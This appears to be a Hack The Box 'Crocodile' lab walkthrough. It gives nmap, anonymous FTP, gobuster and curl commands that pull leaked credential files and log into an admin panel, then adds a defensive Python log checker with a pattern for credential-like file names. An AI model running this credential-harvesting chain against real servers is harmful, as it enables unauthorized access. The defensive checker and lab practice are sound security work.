HTB Crocodile: From Anonymous FTP to Admin Panel for the Flag

Introduction
In this tutorial, we’ll chain an anonymous FTP leak into a hidden web admin login on Hack The Box’s Crocodile box to retrieve the flag.
You’ll learn to:
- Enumerate FTP and download leaked credential files
- Extract valid usernames/passwords
- Use Gobuster to discover hidden web pages
- Authenticate to a PHP login panel and capture the flag
Prerequisites
- Kali Linux (or any distro with ftp, gobuster, curl)
- HTB VPN connection
1. FTP Enumeration
nmap -sC -sV -p 21,80
ftp
# login: anonymous
dir
get allowed.userlist
get allowed.userlist.passwd
Inspect the lists:
cat allowed.userlist
cat allowed.userlist.passwd
2. Extract Credentials
From allowed.userlist and allowed.userlist.passwd, find a valid pair (e.g. admin / Supersecretpassword1).
3. Discover Hidden Pages
gobuster dir \
--url http:/// \
--wordlist /usr/share/wordlists/dirb/common.txt \
-x php,html
Look for /login.php.
4. Admin Login & Flag
curl -d "username=admin&password=Supersecretpassword1" \
http:///login.php
You’ll be redirected to the Admin panel—your flag is displayed at the top.
5. Lessons Learned
- Anonymous services often leak credentials.
- Combine leaked creds with web enumeration for full-chain exploits.
- Automate with scripts in professional engagements.
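The defensive counterpart to the first lesson above, added here and not part of the original walkthrough: a small Python checker that flags file downloads by clients who authenticated as anonymous, run over constructed vsftpd-style log lines (the line format is approximated from vsftpd.log, and the IPs, timestamps and file names are made up).

```python
import re
from collections import namedtuple

# Constructed sample, modelled on vsftpd.log-style lines; not a real capture.
SAMPLE_LOG = """\
Tue Mar 12 10:15:22 2024 [pid 1201] CONNECT: Client "10.10.14.5"
Tue Mar 12 10:15:23 2024 [pid 1200] [anonymous] OK LOGIN: Client "10.10.14.5", anon password "IEUser@"
Tue Mar 12 10:15:30 2024 [pid 1202] [ftp] OK DOWNLOAD: Client "10.10.14.5", "/README.txt", 120 bytes, 1.00Kbyte/sec
Tue Mar 12 10:15:31 2024 [pid 1202] [ftp] OK DOWNLOAD: Client "10.10.14.5", "/allowed.userlist", 33 bytes, 1.23Kbyte/sec
Tue Mar 12 10:15:32 2024 [pid 1202] [ftp] OK DOWNLOAD: Client "10.10.14.5", "/allowed.userlist.passwd", 62 bytes, 2.10Kbyte/sec
Tue Mar 12 10:20:01 2024 [pid 1300] [backup] OK LOGIN: Client "10.10.10.20"
Tue Mar 12 10:20:05 2024 [pid 1302] [backup] OK DOWNLOAD: Client "10.10.10.20", "/nightly.tar.gz", 1048576 bytes, 900.00Kbyte/sec
"""

# timestamp, optional [user], OK/FAIL, ACTION, client IP, optional quoted path
LINE_RE = re.compile(
    r'^(?P<ts>.+?) \[pid \d+\] (?:\[(?P<user>[^\]]+)\] )?'
    r'(?P<status>OK|FAIL) (?P<action>[A-Z]+): Client "(?P<client>[^"]+)"'
    r'(?:, "(?P<path>[^"]+)")?'
)
# File names that should never sit in an anonymous-readable share.
SENSITIVE_RE = re.compile(r'passwd|shadow|userlist|cred|\.key$|\.pem$', re.I)

Finding = namedtuple("Finding", "ts client path severity")

def find_anonymous_downloads(log_text):
    """Return every successful download made by a client that logged in anonymously."""
    anon_clients = set()
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["status"] != "OK":
            continue  # CONNECT lines, failures and unknown formats are ignored
        if m["action"] == "LOGIN" and m["user"] == "anonymous":
            anon_clients.add(m["client"])
        elif m["action"] == "DOWNLOAD" and m["client"] in anon_clients:
            # Any anonymous download is worth a look; credential-looking names are worse.
            severity = "high" if SENSITIVE_RE.search(m["path"] or "") else "medium"
            findings.append(Finding(m["ts"], m["client"], m["path"], severity))
    return findings

if __name__ == "__main__":
    for f in find_anonymous_downloads(SAMPLE_LOG):
        print(f"[{f.severity}] {f.client} fetched {f.path} at {f.ts}")
```

On vsftpd the root-cause fix is anonymous_enable=NO in vsftpd.conf; the checker is for finding exposures that have already happened.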